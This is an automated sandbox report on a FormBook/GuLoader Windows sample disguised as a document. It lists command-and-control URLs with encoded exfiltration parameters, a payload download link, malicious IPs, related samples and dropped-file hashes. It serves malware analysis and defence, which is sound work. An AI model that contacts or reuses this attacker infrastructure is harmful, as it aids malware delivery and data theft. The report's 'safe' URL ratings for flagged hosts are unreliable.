                                                        http://www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.43kdd.top/p3j6/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.rgenerousrs.store/8gp4/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.yc791022.asia/31pt/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zkdamdjj.shop/swhs/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.rgenerousrs.store/8gp4/?ChhG6=J-xs&2O=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4=true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.1secondlending.one/j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.43kdd.top/p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.bankseedz.info/uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.xcvbj.asia/hkgx/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://babalharra.com.au/hEuJhxvbfOcCGqtagtOtF215.binfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.yc791022.asia/31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zkdamdjj.shop/swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xstrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.1secondlending.one/j8pv/true
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://nsis.sf.net/NSIS_ErrorErrorDocument_084462.scr.exe, 00000000.00000000.12521274336.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Document_084462.scr.exe, 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Document_084462.scr.exe, 00000001.00000000.12946377860.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDDocument_084462.scr.exe, 00000001.00000001.12948306647.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                          		high
                                                          https://babalharra.com.au/Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://babalharra.com.au/)71Document_084462.scr.exe, 00000001.00000002.13294715247.00000000076CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.quovadis.bm0Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ocsp.quovadisoffshore.com0Document_084462.scr.exe, 00000001.00000003.13191335248.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000002.13294981161.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078387464.0000000007729000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191092565.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13191550459.0000000007726000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13190897387.0000000007725000.00000004.00000020.00020000.00000000.sdmp, Document_084462.scr.exe, 00000001.00000003.13078643872.0000000007729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          209.74.77.109
                                                          		www.greenthub.lifeUnited States
                                                          		31744MULTIBAND-NEWHOPEUStrue
                                                          13.248.169.48
                                                          		www.optimismbank.xyzUnited States
                                                          		16509AMAZON-02UStrue
                                                          172.67.187.114
                                                          		www.zkdamdjj.shopUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          122.201.127.17
                                                          		babalharra.com.auAustralia
                                                          		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUfalse
                                                          103.224.182.242
                                                          		www.madhf.techAustralia
                                                          		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                          208.91.197.39
                                                          		www.jcsa.infoVirgin Islands (BRITISH)
                                                          		40034CONFLUENCE-NETWORK-INCVGtrue
                                                          38.47.232.202
                                                          		43kdd.topUnited States
                                                          		174COGENT-174UStrue
                                                          104.21.57.248
                                                          		www.rgenerousrs.storeUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          202.92.5.23
                                                          		thaor56.onlineViet Nam
                                                          		45899VNPT-AS-VNVNPTCorpVNtrue
                                                          101.35.209.183
                                                          		www.yc791022.asiaChina
                                                          		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                          149.88.81.190
                                                          		www.xcvbj.asiaUnited States
                                                          		188SAIC-ASUStrue
                                                          23.225.159.42
                                                          		r0lqcud7.nbnnn.xyzUnited States
                                                          		40065CNSERVERSUStrue
                                                          43.205.198.29
                                                          		www.1secondlending.oneJapan4249LILLY-ASUStrue
                                                          74.48.143.82
                                                          		bpgroup.siteCanada
                                                          		14663TELUS-3CAtrue
                                                          46.30.211.38
                                                          		www.bankseedz.infoDenmark
                                                          		51468ONECOMDKtrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1567687
                                                          Start date and time:2024-12-03 18:51:21 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 17m 9s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                          Run name:Suspected Instruction Hammering
                                                          Number of analysed new started processes analysed:4
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Sample name:Document_084462.scr.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/6@19/15
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 86%
                                                          • Number of executed functions: 70
                                                          • Number of non-executed functions: 293
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                          Warnings

                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: Document_084462.scr.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          12:55:17API Interceptor22068113x Sleep call for process: waitfor.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          209.74.77.109Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • www.greenthub.life/r3zg/
                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                          • www.dailyfuns.info/n9b0/
                                                          W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.gogawithme.live/6gtt/
                                                          DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.futuru.xyz/8uep/
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • www.greenthub.life/r3zg/
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • www.moviebuff.info/4r26/
                                                          PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                          • www.gogawithme.live/6gtt/
                                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                                          • www.gogawithme.live/6gtt/
                                                          payments.exeGet hashmaliciousFormBookBrowse
                                                          • www.gogawithme.live/6gtt/
                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                          • www.dailyfuns.info/n9b0/
                                                          13.248.169.48Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                          • www.smartgov.shop/1cwp/
                                                          SW_5724.exeGet hashmaliciousFormBookBrowse
                                                          • www.egyshare.xyz/440l/
                                                          attached invoice.exeGet hashmaliciousFormBookBrowse
                                                          • www.aktmarket.xyz/wb7v/
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • www.tals.xyz/k1td/
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • www.optimismbank.xyz/98j3/
                                                          lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                          • www.avalanchefi.xyz/ctta/
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • www.tals.xyz/k1td/
                                                          PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                          • www.heliopsis.xyz/69zn/
                                                          1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.gupiao.bet/t3a1/
                                                          Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.hasan.cloud/tur7/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.optimismbank.xyzProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          www.xcvbj.asiaProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                          • 149.88.81.190
                                                          www.bankseedz.infoProforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 46.30.211.38
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 46.30.211.38
                                                          www.madhf.techNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 15.204.67.7
                                                          Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 103.224.182.242
                                                          PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                          • 103.224.182.242
                                                          r0lqcud7.nbnnn.xyzquotation.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 23.225.159.42
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 202.79.161.151
                                                          ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 202.79.161.151
                                                          OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                          • 27.124.4.246
                                                          REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.160.132

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSAudioplaybackVM--00-32AoTranscript.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          PAYMENT RECEIPT_pdf.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.67.152
                                                          fiyati_teklif 65W20_ B#U00fcy#U00fck mokapto Sipari#U015fi _PDF_.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.67.152
                                                          nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                          • 104.21.84.67
                                                          https://0azeevmdi7.codedesign.app/Get hashmaliciousUnknownBrowse
                                                          • 104.21.87.110
                                                          https://mokshtech.nintender.net/?mokshtech=mokshtechGet hashmaliciousReCaptcha PhishBrowse
                                                          • 104.21.58.76
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.165.166
                                                          win_gui.exe.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.167.249
                                                          http://tdbdb762a.emailsys2a.net/c/274/7971374/454/0/15142205/1/5028/bb18c09ced.html#XREBECCA.BATES@GELITA.COMGet hashmaliciousUnknownBrowse
                                                          • 104.16.123.96
                                                          Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                                          • 172.67.69.226
                                                          AMAZON-02USguia241993.vbsGet hashmaliciousUnknownBrowse
                                                          • 52.95.170.72
                                                          https://0azeevmdi7.codedesign.app/Get hashmaliciousUnknownBrowse
                                                          • 18.202.131.124
                                                          http://tdbdb762a.emailsys2a.net/c/274/7971374/454/0/15142205/1/5028/bb18c09ced.html#XREBECCA.BATES@GELITA.COMGet hashmaliciousUnknownBrowse
                                                          • 13.124.42.247
                                                          Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                                          • 13.227.8.47
                                                          https://temp.farenheit.net/XWU9WdXVLQ1BPcVcwN28vNmJmQW9rZy9JbGl2YjNqdU82UXRXbjVuRDE4WHZ2S3E3MTh0U0RLVVRZRjcvL3o0M1ZEZW5HMGQ2cUJ6Q1dmd0d6MzNsK1IwNkc0c1FQTlFkODFpdjI1RE5wTTZrZjNNL2ZlNTNzb3kvbXlTenlUOC94REZCNXJyYzEwcDduQ0JYM1JvQnpTTEhpdHIzWXlMVFh3dnJkNWo5N3JWODhWWVd4MWx5T0pqcUNZQlY3ZHRFTktEUGRLRVR4czR1dTMvY282WURmWGE0TkhiSkd2dkNZOUlGWUE9PS0tVVdmbHMzdlpZZDU2aFdnMy0teWdvSnFiVklFSk13UEoyUlNUQzd4Zz09?cid=2308276595Get hashmaliciousKnowBe4Browse
                                                          • 52.217.126.49
                                                          http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                                                          • 63.33.81.165
                                                          Infraccion-Multa.msiGet hashmaliciousAteraAgentBrowse
                                                          • 108.158.75.12
                                                          https://1wbapm.lifeGet hashmaliciousUnknownBrowse
                                                          • 108.158.75.109
                                                          https://four-shared-field.glitch.me/#admin@average-adjusters.comGet hashmaliciousUnknownBrowse
                                                          • 108.158.75.69
                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUhttp://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                                                          • 203.170.87.17
                                                          http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                                                          • 203.170.87.17
                                                          https://sp792669.sitebeat.crazydomains.comGet hashmaliciousUnknownBrowse
                                                          • 103.67.235.120
                                                          Statement_of_account.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 203.170.87.17
                                                          https://www.google.ml/url?fvg=1YI3fC8whlGPBCiMyiuQ&bhtBf=8EQhXbuMThqowIo0zyCX&sa=t&ndg=afydNw3nDHf9A6uq2MCH&url=amp%2Fiestpcanipaco.edu.pe%2F.r%2Fu1kOgE-SURELILYYWRhcnNoLm1hbGhvdHJhQGphdG8uY29tGet hashmaliciousHTMLPhisherBrowse
                                                          • 163.47.73.97
                                                          https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                          • 122.201.80.182
                                                          https://www.primechoicefinance.com.au/dykjj.php?7096797967704b53693230746450797938717a5330754c4530737a736a58533837503155744a31533870547662544277413dYnJhc3dlbGxzQGhlbGVuYWluZHVzdHJpZXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                                          • 122.201.80.182
                                                          https://www.google.lu/url?q=dK5oN8bP2yJ1vL3qF6gT0cR9mW4sH7jD2uY8kX5zM0nW4rT9pB6yG3lF1oJ8qV2kN7dP5uC3xH6tR0jL4wY1vS9mD2bT8nK7yX5rJ3qG0sW6lP9oF2aH1kpQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&esrc=026rlFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bgalapagos%C2%ADhostal%C2%AD%C2%ADtintorera%C2%AD.com%2Fauoth%2Fmeme%2Fnexpoint.com/c2pvaG5zb25AbmV4cG9pbnQuY29tGet hashmaliciousMamba2FABrowse
                                                          • 27.54.88.98
                                                          https://www.cognitoforms.com/f/wAh1CzXrnEmEifrmJ4OEgg/1Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                          • 27.54.88.98
                                                          yakuza.i686.elfGet hashmaliciousUnknownBrowse
                                                          • 103.226.223.159
                                                          MULTIBAND-NEWHOPEUSPp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.79.42
                                                          SW_5724.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.107
                                                          72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.79.42
                                                          quotation.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.107
                                                          Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.109
                                                          Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 209.74.77.107
                                                          specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 209.74.64.187
                                                          Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.108
                                                          specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 209.74.77.107
                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.109

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e192.exeGet hashmaliciousUnknownBrowse
                                                          • 122.201.127.17
                                                          guia241993.vbsGet hashmaliciousUnknownBrowse
                                                          • 122.201.127.17
                                                          win_gui.exe.exeGet hashmaliciousUnknownBrowse
                                                          • 122.201.127.17
                                                          MLETdJL8JJ.exeGet hashmaliciousGuLoaderBrowse
                                                          • 122.201.127.17
                                                          eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                          • 122.201.127.17
                                                          tebWUNHW7S.exeGet hashmaliciousGuLoaderBrowse
                                                          • 122.201.127.17
                                                          kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                                          • 122.201.127.17
                                                          RAZTZoDeHA.exeGet hashmaliciousGuLoaderBrowse
                                                          • 122.201.127.17
                                                          eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                          • 122.201.127.17
                                                          kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                                          • 122.201.127.17

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dllPO.exeGet hashmaliciousGuLoaderBrowse
                                                            PO.exeGet hashmaliciousGuLoaderBrowse
                                                              yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                                                yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                                                  IMAGE000Pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                    stormskridtets.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      IMAGE000Pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        orders_PI 008-01.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          RemotePCViewer.exeGet hashmaliciousUnknownBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\FxK39HI69

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\waitfor.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):135168
                                                                            Entropy (8bit):1.1142956103012707
                                                                            Encrypted:false
                                                                            SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                            MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                            SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                            SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                            SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp\System.dll

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):12288
                                                                            Entropy (8bit):5.737556724687435
                                                                            Encrypted:false
                                                                            SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                                                            MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                                                            SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                                                            SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                                                            SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: PO.exe, Detection: malicious, Browse
                                                                            • Filename: PO.exe, Detection: malicious, Browse
                                                                            • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                                                            • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                                                            • Filename: IMAGE000Pdf.exe, Detection: malicious, Browse
                                                                            • Filename: stormskridtets.exe, Detection: malicious, Browse
                                                                            • Filename: IMAGE000Pdf.exe, Detection: malicious, Browse
                                                                            • Filename: orders_PI 008-01.exe, Detection: malicious, Browse
                                                                            • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Reconsolidates.Ind

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):304925
                                                                            Entropy (8bit):7.634681653349571
                                                                            Encrypted:false
                                                                            SSDEEP:6144:xIzwYKF20lQ11epuJK247DJXcttrow2pc7pIiZrFP0B:xIzw0mj5t7q3sw2pc7eiZrFM
                                                                            MD5:441D2CEA6B12B330064FADB3BAAC31E4
                                                                            SHA1:3FAD8D74BFFB31012A1B22C682388D4DBA848040
                                                                            SHA-256:F10E813A698E1536AE7BFCDEC3479AD699D464378E786BB53B3566E3FDF13A76
                                                                            SHA-512:8B84C3FACBE9DC9C8821F00E896A920B6F8359A9C10A170456E94A6CE749C7184DBC0772C9553813BCD91EB72FE0046CC68D8194698ECA4A20A4F33011C27920
                                                                            Malicious:false
